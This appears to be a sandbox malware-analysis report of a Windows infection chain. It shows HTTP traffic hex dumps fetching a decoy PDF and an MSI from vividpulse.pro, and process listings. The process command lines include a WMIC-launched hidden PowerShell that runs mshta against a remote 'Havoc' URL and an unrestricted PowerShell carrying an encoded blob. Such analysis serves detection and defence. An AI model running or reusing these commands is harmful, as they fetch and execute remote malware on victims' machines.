                                          2024-12-31 09:38:03 UTC16384INData Raw: 04 41 00 e9 46 fb ff ff cc cc cc cc cc cc 8d 4d f0 e9 15 4c ff ff 8d 4d ec e9 0d 4c ff ff 8d 4d d4 e9 6d 69 ff ff 8d 4d e0 e9 fd 4b ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a cc 33 c8 e8 ba f0 ff ff b8 ac 04 41 00 e9 fe fa ff ff cc cc cc cc cc cc 8d 8d d4 fd ff ff e9 2c a5 ff ff 8d 8d e8 fd ff ff e9 2c 85 ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 8a d0 fd ff ff 33 c8 e8 79 f0 ff ff 8b 4a fc 33 c8 e8 6f f0 ff ff b8 f0 04 41 00 e9 b3 fa ff ff cc cc cc cc cc cc 8d 4d f0 e9 ef 84 ff ff 8d 4d ec e9 e7 84 ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 8a 7c ff ff ff 33 c8 e8 34 f0 ff ff b8 24 05 41 00 e9 78 fa ff ff cc cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 11 f0 ff ff b8 74 02 41 00 e9 55 fa ff ff cc cc cc cc cc cc
                                          Data Ascii: AFMLMLMmiMKT$BJ3A,,T$B3yJ3oAMMT$B|34$AxT$BJ3tAU


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.64973192.113.18.1934436892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-31 09:38:06 UTC84OUTGET /Fox/API%20_Guide.pdf HTTP/1.1
                                          Host: vividpulse.pro
                                          Connection: Keep-Alive
                                          2024-12-31 09:38:07 UTC427INHTTP/1.1 200 OK
                                          Connection: close
                                          cache-control: public, max-age=2592000
                                          expires: Thu, 30 Jan 2025 09:38:07 GMT
                                          content-type: application/pdf
                                          last-modified: Mon, 30 Dec 2024 11:56:40 GMT
                                          etag: "e6cd-67728a78-6322ff7f0aa90657;;;"
                                          accept-ranges: bytes
                                          content-length: 59085
                                          date: Tue, 31 Dec 2024 09:38:07 GMT
                                          server: LiteSpeed
                                          platform: hostinger
                                          panel: hpanel
                                          content-security-policy: upgrade-insecure-requests
                                          2024-12-31 09:38:07 UTC16384INData Raw: 25 50 44 46 2d 31 2e 34 0a 25 e2 e3 cf d3 0a 31 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 63 61 20 31 0a 2f 42 4d 20 2f 4e 6f 72 6d 61 6c 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 43 41 20 31 0a 2f 63 61 20 31 0a 2f 4c 43 20 30 0a 2f 4c 4a 20 30 0a 2f 4c 57 20 33 0a 2f 4d 4c 20 34 0a 2f 53 41 20 74 72 75 65 0a 2f 42 4d 20 2f 4e 6f 72 6d 61 6c 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 31 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 39 33 0a 2f 4e 20 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 90 bd 4a c3 00 14 85 bf d4 82 28 8a 83 0e 1d 1c 32 38 b8 68 93 a6 69 52 70 69 22 16 d7 56 a1 a9 53 92 a6 41 ec 4f 48 53 f4 01 74 73 70 75 2b 2e be 80 e8 63 28 08 0e e2 e0 23
                                          Data Ascii: %PDF-1.4%11 0 obj<</ca 1/BM /Normal>>endobj12 0 obj<</CA 1/ca 1/LC 0/LJ 0/LW 3/ML 4/SA true/BM /Normal>>endobj14 0 obj<</Length 293/N 3/Filter /FlateDecode>>streamx}J(28hiRpi"VSAOHStspu+.c(#
                                          2024-12-31 09:38:07 UTC16384INData Raw: e5 77 ec 66 e6 0f 47 77 f3 9d cb e3 77 54 c1 09 34 9d 75 47 2d fa 67 77 54 bd 51 07 2b 33 2d ea 5b ea a7 94 ee 16 5f 7d ef 75 f1 9e 4f d5 98 fa e6 2b 22 d7 1c cb 64 fe 84 7f c3 51 e6 5d 3c c9 02 f1 3c 03 4e 9a 84 df b2 26 31 f8 a5 20 96 b1 3c 61 f8 5e 96 ea 47 ea 87 65 98 cd 19 26 01 84 3e 15 b2 31 9e e5 48 c2 83 68 95 fa 06 94 7d 3f a7 45 4f db 9e a1 53 d4 53 b4 54 7d fd 65 1b 33 9b b1 a8 b7 d3 4b 63 7f 89 9d a0 b7 e1 49 99 50 ff ed 84 93 32 f1 fb b2 14 8e 41 17 e2 f0 8b 08 90 28 e4 bf 7e fd 34 fc 8d 92 26 d3 12 0e 2d 3a 93 88 66 28 e7 51 a0 19 ce c2 79 14 ed 19 2e 9d 70 0b 07 2e 69 1a 23 ef df 94 ef ce c8 ae 2f 0c 84 e6 66 a9 0b 68 1e cd c8 a2 29 34 47 ad a9 d8 be ff 0a d5 9d 99 f1 2b 61 92 49 6e 5d c0 6d 89 51 66 64 78 cd 2d fb db 81 96 d5 23 1f d3 93
                                          Data Ascii: wfGwwT4uG-gwTQ+3-[_}uO+"dQ]<<N&1 <a^Ge&>1Hh}?EOSST}e3KcIP2A(~4&-:f(Qy.p.i#/fh)4G+aIn]mQfdx-#
                                          2024-12-31 09:38:07 UTC16384INData Raw: dd f1 3d 77 1c 9a 3f cf da e5 bc bb ee 18 e9 0d 86 95 4c 52 e5 ce 82 f3 3e c5 8d d7 99 60 0d 59 9d 30 b8 eb 4a 5e dd 16 88 cb b5 8c fb 14 8f 2d 16 67 96 f9 8d c7 2e 15 7c 97 f3 50 a6 88 31 24 ab ea 0f e7 c8 4c 00 72 47 db 59 71 b8 79 04 23 65 dd c5 a4 ba e2 3b 8d 2a b9 a1 76 be 85 ac ab 84 75 09 67 9f 0d 58 be 12 e6 f3 7b 5d 8b fb 8f d7 99 0b ce 20 8b 47 aa 55 ed c2 1b 14 f5 5d ae 06 e4 85 64 70 d4 9d a8 d6 9d 38 bd 45 8e ac aa 1b 8b 70 b7 25 9b d5 65 81 bc 15 18 e7 61 7a 4d 46 53 5c bb 75 76 7f 52 39 ff 2a 1e a5 ec d2 0c 5f 30 02 ca f5 55 e3 d5 e1 93 2b f1 88 ca 58 11 d2 2d e2 74 f5 d8 87 76 e6 b9 e1 3a f1 f0 4a 5b 45 86 f7 4e 6f dc 87 40 71 12 46 b4 8f 2f cd f5 cf 20 6e ff 3c fb 26 33 a8 44 bb ab 5d 20 a0 1b 77 b5 68 71 40 fb be b9 7e fe dc fd 54 00 d2
                                          Data Ascii: =w?LR>`Y0J^-g.|P1$LrGYqy#e;*vugX{] GU]dp8Ep%eazMFS\uvR9*_0U+X-tv:J[ENo@qF/ n<&3D] whq@~T
                                          2024-12-31 09:38:07 UTC9933INData Raw: fe 3e 49 6d 15 dd 1d 9b 0a 29 e6 b6 e6 2b 92 16 c4 9e 45 30 32 77 90 9c 32 3c 15 ad a4 8d e5 e4 01 ee d3 53 26 58 c6 35 f5 92 3e ec 61 19 db 2d 2c a3 87 1f 60 19 7b 76 b0 2c c3 0e 96 95 d8 c3 32 b6 77 b0 8c ed 16 96 b1 79 80 65 ec d9 c1 b2 da 10 43 41 0b cb b1 33 43 4c 7e 20 83 50 25 99 61 2a cf b9 81 58 e6 28 83 5c e5 38 a3 60 12 29 83 64 96 38 c3 68 d5 49 06 da a4 34 51 d5 b9 7e 4c b0 2c dd 1e 96 b1 bd 83 65 69 8f b0 8c 3d 3b 58 c6 76 0b cb b1 c8 d9 c2 32 b6 77 b0 8c ed 1d 2c 63 fb 00 cb d2 ec 61 79 bd 0a b0 fe 69 60 79 ed 4c 56 c9 0f 24 b3 55 8a d9 ae 79 ce cd ea 99 a3 ec 15 95 e3 e2 36 76 07 cb 59 e2 e2 77 f6 08 cb 59 6b b6 2a d4 26 25 93 b0 ac f2 51 4f c8 0c 13 56 76 0f 6f bb 33 d0 5c 4a 91 58 6f 53 99 11 10 22 ad 65 50 20 86 71 da 97 c4 a0 39 b4 16
                                          Data Ascii: >Im)+E02w2<S&X5>a-,`{v,2wyeCA3CL~ P%a*X(\8`)d8hI4Q~L,ei=;Xv2w,cayi`yLV$Uy6vYwYk*&%QOVvo3\JXoS"eP q9


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.64974392.113.18.1934436892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-31 09:38:08 UTC60OUTGET /Quantum/XZJKPUBX.msi HTTP/1.1
                                          Host: vividpulse.pro
                                          2024-12-31 09:38:08 UTC439INHTTP/1.1 200 OK
                                          Connection: close
                                          cache-control: public, max-age=604800
                                          expires: Tue, 07 Jan 2025 09:38:08 GMT
                                          content-type: application/octet-stream
                                          last-modified: Mon, 30 Dec 2024 11:57:29 GMT
                                          etag: "169000-67728aa9-c41cbf708bce13d1;;;"
                                          accept-ranges: bytes
                                          content-length: 1478656
                                          date: Tue, 31 Dec 2024 09:38:08 GMT
                                          server: LiteSpeed
                                          platform: hostinger
                                          panel: hpanel
                                          content-security-policy: upgrade-insecure-requests
                                          2024-12-31 09:38:08 UTC16384INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                          Data Ascii: >
                                          2024-12-31 09:38:08 UTC16384INData Raw: fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 cc 01 00 00 0e 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 80 00 00 00 03 00 00 00 a0 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c8 00 00 00 06 00 00 00 dc 00 00 00 07 00 00 00 38 01 00 00 09 00 00 00 4c 01 00 00 0c 00 00 00 7c 01 00 00 0d 00 00 00 88 01 00 00 0e 00 00 00 94 01 00 00 0f 00 00 00 9c 01 00 00 12 00 00 00 a4 01 00 00 13 00 00 00 c4 01 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 16 00 00 00 49 6e 73 74 61 6c 6c 61 74 69 6f 6e 20 44 61 74 61 62 61 73 65 00 00 00 1e 00 00 00 08 00 00 00 56 65 74 65 72 61 6e 00 1e 00 00 00 0f 00 00 00 43 68 61 70 6d 61 6e 20 46 61 71 75 69 72 00 00 1e 00 00 00 0a 00 00
                                          Data Ascii: Oh+'0x8L|Installation DatabaseVeteranChapman Faquir
                                          2024-12-31 09:38:08 UTC16384INData Raw: c7 ea 1f 50 8e 00 3b e5 64 b5 38 d9 64 34 5c 07 4b 81 8b 16 41 b6 a2 61 38 7b 02 57 cc 8b 26 98 e8 7b 4c a2 97 c8 2c c0 2d e1 20 de 01 14 2c 37 0f 5a 15 9b 28 b0 2a 31 82 9a cb 1b cf 5d 8a a1 f7 ea 40 60 c1 a8 27 e6 06 13 07 0e 86 3f f1 22 e7 89 bf 40 fd 96 91 21 07 f6 d4 e8 39 7e 07 ec f8 63 03 95 27 c7 93 3e 96 44 d7 1c 72 7a 57 3f a8 af 9f 8e f4 b9 b4 b9 27 ac d2 4c 5f 84 5a e0 9e 20 72 e0 38 a1 f2 0b e2 a9 cc 53 87 79 fc f9 bd 70 cb 4e 71 7f 1d 4a 22 3f 4f dd c4 50 88 85 91 e4 97 0b 78 40 37 72 50 39 3c 22 12 02 cd ad 86 53 d9 49 9e bf ef 5a f0 15 42 41 3f 96 94 f1 f9 51 22 9f 29 a3 9e 9d f8 15 59 a7 92 79 e3 17 cb 36 da e4 52 0b b7 2f 15 7b 58 1c 10 2a 3f 89 77 4b 3a d6 13 a9 bc 4a f9 02 f9 86 5e bd e8 7a 4e 1b 4d 07 b3 80 ac d7 01 7c 14 eb 09 d4 31
                                          Data Ascii: P;d8d4\KAa8{W&{L,- ,7Z(*1]@`'?"@!9~c'>DrzW?'L_Z r8SypNqJ"?OPx@7rP9<"SIZBA?Q")Yy6R/{X*?wK:J^zNM|1
                                          2024-12-31 09:38:08 UTC16384INData Raw: 5e 40 4a c3 db dd 20 2f 30 46 d7 e2 51 57 7c ef a2 00 eb 84 52 a0 5d 0c 26 31 c9 2f 56 de 4f 01 1f 7f 30 d6 ad a3 7f f6 25 01 0a 01 f3 b4 40 09 de 45 6e be 01 b9 a1 0d 6f 69 3b ae 73 6d 06 6a e4 cb 39 38 ae 78 9a 78 2c 30 70 d9 36 00 42 4f d0 10 af ef e0 fc 91 63 db 8f 17 d2 cd 9f 72 f1 aa d1 d9 99 b3 23 5e 32 90 e1 ea 7b cd 58 78 0d 68 74 62 84 2c e4 a8 be 54 05 ad 71 71 74 bf 4f 66 1c ff 46 6d a7 23 7c 2c dc d9 1c af f7 44 a7 7d cc 32 88 5d ea c6 08 81 b7 cb 5f 29 c6 56 af 9f 39 a2 05 dd bf 85 82 71 b6 05 bd e9 82 26 59 17 b7 7e 6a 95 2a 9d 88 cc 8c 71 da 5d 62 b3 6e f5 bb 29 e3 4b 3d 8e d4 88 f9 f9 00 46 87 ad 19 c9 36 35 d7 24 1e 59 c1 36 53 f3 21 74 ff 62 6b 96 4f 96 94 e4 0c 55 94 99 b2 70 94 4e 33 35 64 91 56 46 06 2d 6a 5c a0 b4 86 a5 e5 91 0d ba
                                          Data Ascii: ^@J /0FQW|R]&1/VO0%@Enoi;smj98xx,0p6BOcr#^2{Xxhtb,TqqtOfFm#|,D}2]_)V9q&Y~j*q]bn)K=F65$Y6S!tbkOUpN35dVF-j\
                                          2024-12-31 09:38:08 UTC16384INData Raw: e9 84 8c 43 97 83 95 59 59 f9 95 4e d8 34 a3 ca cf d5 c6 7d 17 89 73 71 aa 38 69 58 8a 61 53 d8 40 3f d2 b9 8a c2 cc 94 e9 c6 e2 9d ef c1 9b c1 d6 a0 aa 87 9b 16 f6 50 d3 12 1d 3a b1 08 84 15 13 0e 19 47 76 a0 3e 29 bf 0c 5f 1f b0 98 e8 dc e6 45 a8 d9 83 a1 b1 18 a9 25 0d 3a c7 59 ed 01 dc 9d 03 bd 4c e7 57 2f 47 cf a2 7b 89 d2 1a f5 a4 12 56 90 70 28 ad 6a 4c cd 90 0a 49 20 71 a8 3d 96 3a df 0d 08 35 f4 9e b2 85 33 55 7c 92 fc 8d 6b 4f 34 3e ce 0c a0 4c 70 bd 18 ea 0b 3a 45 e0 e4 de 1b 71 2e 13 91 e7 9e cd c7 2b dc 50 8e fa 1f 4b 03 dd 1a 84 9f bf c3 75 1c 32 35 95 e9 4d f3 bc 8e 38 91 0c ea 27 37 8e 72 b9 f2 c5 20 9c 16 21 79 eb 05 bf d4 1c d2 09 90 b6 e6 bd de 90 82 9e 0d f1 84 f5 3a ee 0b 4a a0 1c 2d b0 0e f8 3f f0 22 a1 d1 6b 84 b6 02 2c f4 81 92 a3
                                          Data Ascii: CYYN4}sq8iXaS@?P:Gv>)_E%:YLW/G{Vp(jLI q=:53U|kO4>Lp:Eq.+PKu25M8'7r !y:J-?"k,
                                          2024-12-31 09:38:08 UTC16384INData Raw: f4 4a 79 e8 db 1c 03 f5 d3 d3 c8 76 03 b1 57 3a 35 37 9e 9f c5 81 fb b1 ab 2b 37 8a 6f 04 ce ad ff 9a e4 ff 6c 3f f9 59 37 2a 16 89 af ec 11 ed 3d a2 f3 91 77 4e 16 5e ae 74 2b ee 9c 0c 7d 44 e6 8e ec a5 6a de 1e c7 9b 1d 24 a5 78 95 70 e1 62 41 99 3f e6 b5 da 8d 52 1e e5 c7 8f 79 56 4d 54 07 fa 31 e6 f0 fc b1 d3 dc f6 a5 d6 77 07 b7 e8 83 55 76 8b ed be 68 3d 49 ba a9 93 f4 12 68 c9 d4 ed 75 75 a4 5f d7 cc b8 24 f5 67 e6 36 a7 ed d3 87 1f d4 f2 6b 59 ba d7 5c 3b 9f 74 8f cd a4 dd c3 38 83 9d be 6e 3f c8 1a 4c 40 2d 43 8a d1 7a 2b 69 2d 59 6c 69 b2 6e a6 cd 2b 3b 9c 99 49 ae 51 5d dd f5 a3 d7 cb 96 57 e7 8f b5 66 9b 21 f1 f1 fe bd c9 cb fa 1e 5c 1f a4 9c 75 8f f4 ee 9d 9b 0a 3b 5f 52 64 bb b8 dc e8 69 90 b2 e1 b3 96 ba f3 97 25 5d d6 b3 48 c5 eb 53 c3 6d
                                          Data Ascii: JyvW:57+7ol?Y7*=wN^t+}Dj$xpbA?RyVMT1wUvh=Ihuu_$g6kY\;t8n?L@-Cz+i-Ylin+;IQ]Wf!\u;_Rdi%]HSm
                                          2024-12-31 09:38:08 UTC16384INData Raw: ae b0 e8 92 9b 40 23 a4 a9 d4 2a 11 7c 63 0b 12 38 52 6e f5 24 d9 43 8a 98 24 ec 99 27 b6 97 a7 ca 39 28 10 cd 8d 88 4f 33 99 ce 96 e8 df 91 85 ce 2c 22 14 fe 04 be d2 7a fc 5f 66 9a ef 54 76 4c a2 3e fd 46 87 1b cd 9b d5 66 f6 56 82 a9 f9 0e 9f 7b c1 cc e9 46 8b de bf 25 0f 46 f1 ec 26 1c 3f e7 69 2b 12 6f 83 22 eb 65 9b 9b 88 59 b5 66 08 b3 70 81 6c 39 9f 6b 22 8a 43 07 c6 db e3 64 a6 9d b7 2e 84 0e 89 0d cd d0 61 35 6a da 4d 4e d7 07 7b 59 fa 20 9a e7 c4 21 07 5c 1f 8c 6e c6 44 62 8f 53 27 53 20 de 9b 27 4c e9 11 b6 51 34 08 57 c5 77 a6 f0 49 dd 0f a8 ac db 92 4d fc 67 e7 99 45 9d 22 3c 48 36 e4 9e f9 bd 41 39 2e 8f 48 92 7e 92 78 1c 67 de f1 70 a3 46 96 96 46 47 48 01 7d 55 df 80 8f 45 b0 9b 92 27 4c 0c 3f 8d d7 2f 0f f4 96 53 95 21 84 79 b7 19 b2 85
                                          Data Ascii: @#*|c8Rn$C$'9(O3,"z_fTvL>FfV{F%F&?i+o"eYfpl9k"Cd.a5jMN{Y !\nDbS'S 'LQ4WwIMgE"<H6A9.H~xgpFFGH}UE'L?/S!y
                                          2024-12-31 09:38:08 UTC16384INData Raw: 99 bf 68 16 46 eb b3 47 3d 9a 11 5e 6b e9 ba 47 ba e0 0a 0d a0 08 11 e3 bd e6 26 e0 d1 28 73 33 cc 74 26 9c eb 62 07 33 99 b9 b3 ad 83 2e 96 ee 89 bd be 22 65 56 9c 15 91 56 d8 5a 8d 31 8d e2 7d 9d 2c ce a7 18 5d 41 78 85 e8 15 e4 57 eb de ff 62 bd e5 0d 83 16 72 be e6 75 75 f1 4d 60 76 de 64 00 18 d8 eb 2c b2 66 3f ee 55 91 c6 c6 9a 19 6d c5 bf 1c 34 73 46 04 4e 33 ec 75 c6 7e 54 94 5e 0d b6 1a 6e 35 de 6b c4 d7 90 a1 31 ba 86 12 8d d8 35 cc 68 bb ea 35 1c 72 ee 9a 74 a6 76 b7 75 fb 1a 4b cb 9a 6c d9 b6 ad cf 5b 78 f9 55 ad 4d b1 4d f5 3d 4d bd 4d c5 4d c9 86 cd 75 93 12 53 e4 b6 db 62 cb 51 48 6c ac ad 3b ca ed 3a 5a b3 56 ed da f5 57 e3 b9 68 40 b0 98 1d af 36 bf 43 6b 0f d8 1e b9 3d 89 87 4f 71 73 2d 23 5e 47 5d 1e 89 3c ec f7 60 e3 81 bd 87 3f f8 66
                                          Data Ascii: hFG=^kG&(s3t&b3."eVVZ1},]AxWbruuM`vd,f?Um4sFN3u~T^n5k15h5rtvuKl[xUMM=MMMuSbQHl;:ZVWh@6Ck=Oqs-#^G]<`?f
                                          2024-12-31 09:38:08 UTC16384INData Raw: 7e 19 a7 05 4f d1 e7 ac cd 93 a7 c1 a5 49 05 aa 7f 7b 9a 89 ab fd 52 ad ad 75 fc 61 8b aa cc af a2 09 18 5b e6 9a 2e a4 dc 4c 51 7e ca d8 9f a2 1f af d8 4d e7 b0 6e b5 fa 89 47 76 5f e0 fc a1 fd 4c d1 bf 5d 33 7c 87 9a 0c ff 6e f9 dc 93 a7 1b 54 0a 83 74 a2 8b 3b 9b cb bb 6e 5b 2a 35 f2 6e 4a d3 31 d2 c7 65 bd b1 b2 cd 21 c7 fa 23 5f 64 24 91 56 4e ba 5e 0b ce 6a 87 99 80 66 eb 6f 0e 39 ed eb 27 da 2e 84 73 3e b3 8b 6e 3f 3d 1a 24 cc 5c b3 05 fe cb 89 b3 cd 83 3b 02 3a ef 94 a9 b9 90 92 6a 3e 11 5b e7 56 c1 1f 96 98 e6 5d ff ad ac 16 19 58 f2 d9 1e 3c 81 f6 16 a6 bb 2a 1d 69 27 75 74 66 51 bd ca 2c 15 57 08 38 40 47 c8 3e 6f 6a d4 01 57 03 36 83 e0 91 4d fc 1f 74 17 19 2f e3 f0 03 83 d7 30 25 63 06 5f d9 a9 8e fd 41 b6 31 6a 9b 7e 80 1e cb 16 23 17 fc aa
                                          Data Ascii: ~OI{Rua[.LQ~MnGv_L]3|nTt;n[*5nJ1e!#_d$VN^jfo9'.s>n?=$\;:j>[V]X<*i'utfQ,W8@G>ojW6Mt/0%c_A1j~#
                                          2024-12-31 09:38:08 UTC16384INData Raw: 96 9e 19 e2 7f c8 3f 51 74 ba 6d 3d e7 3e a5 9a 0c 84 d8 13 ec 7e d4 fd e3 ac fa 21 14 29 d7 ed 16 28 df 1a eb 76 86 88 7d 5a 84 e5 65 b1 82 51 51 fb d2 1c fe ef 6f e9 e8 05 74 fb db ff 83 ea e6 fa b8 50 ea d5 2a a9 f4 42 e6 f5 45 4a b9 28 d4 d5 c7 9c 69 f6 04 21 dc fc 5e b7 f7 7b ca 8d 6e 3f 57 d5 77 fa 75 cd 3a 45 d2 69 f6 9a dd 0c ac 5f af ce 96 1e 52 31 7b 3b 75 3f 2a 47 16 bd f0 71 8b 50 52 d3 73 47 67 a4 96 27 24 6c d8 40 18 e0 75 55 b7 28 84 9b b8 4b 33 bb 78 70 83 c2 1a 18 67 8d 7b 0f 09 b3 24 20 fb ef d2 d0 07 12 10 9a 9f ad 4e 3f 54 84 74 ad 3d a4 66 c9 63 4e b9 80 aa fa 7f 2e f7 11 f1 76 15 bf b4 74 d4 6d b5 66 d3 7b 92 9c 22 35 4a 54 7e dd a1 50 9f e6 c8 1e 60 69 fe 61 87 3f b2 db 72 95 56 86 e1 ac 28 df 0a 1b 65 06 c0 03 9b c3 e1 97 d7 ca 80
                                          Data Ascii: ?Qtm=>~!)(v}ZeQQotP*BEJ(i!^{n?Wwu:Ei_R1{;u?*GqPRsGg'$l@uU(K3xpg{$ N?Tt=fcN.vtmf{"5JT~P`ia?rV(e


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:04:37:57
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')"
                                          Imagebase:0x7ff6068b0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:1
                                          Start time:04:37:57
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:04:37:58
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:04:37:58
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:04:38:00
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://vividpulse.pro/Seed/Havoc"
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:04:38:00
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\mshta.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc
                                          Imagebase:0x7ff7e7f30000
                                          File size:14'848 bytes
                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:04:38:02
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:9
                                          Start time:04:38:03
                                          Start date:31/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696CB12928616D0C543FDF4FA01CD781A0FD3E27C492347CD5958399225168576CBA1BCF230F43AF6432BD57AE6B38C04EF2A370A6A7A9217AF16A8216F99E4E18DF0865A002FCA560819251C521CBC36B7AF93394D9C3B2BF598BCA8B7E7AF02167AA470C45A1CCE0FCFCAF7F27ABD86382030EE615D8E88E22FE52ED3BE7920C11B0D69789B0869401C0E48DD6B755FE432D03A5A497E5F28EB5E5E44FAFA0C505E6623DFE084696F472CA065C02C263ECEB0AFAD35CE69BFF06ABA1F5B3F0DDA7BA73DD774EB332B541081F516B8571C7AF7673AF3AF66AAB18B80B1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14B3B80F48DC0B376FEF3EC7781DB3ABF08D8CA09272DF1FDFB6A49276F6B84EB85FD08DE40DCECA35D65C7E4C6AF03BD30E2758EA776531B78AC2A0CDB1152B752476FCA117CF49836F1D3F580C7F1EFCC3DF72889A84719CD9CB0906E4426AB5B5ACB90919BB40912D707A2EDBFDF4CA474944334791F9CDE97423D874DEC32D3F51D82D569C9BA9BE15F8C8F45EE5E616DC1ACCF500C07D6397B43D0B7996460B9038754E3BB20065A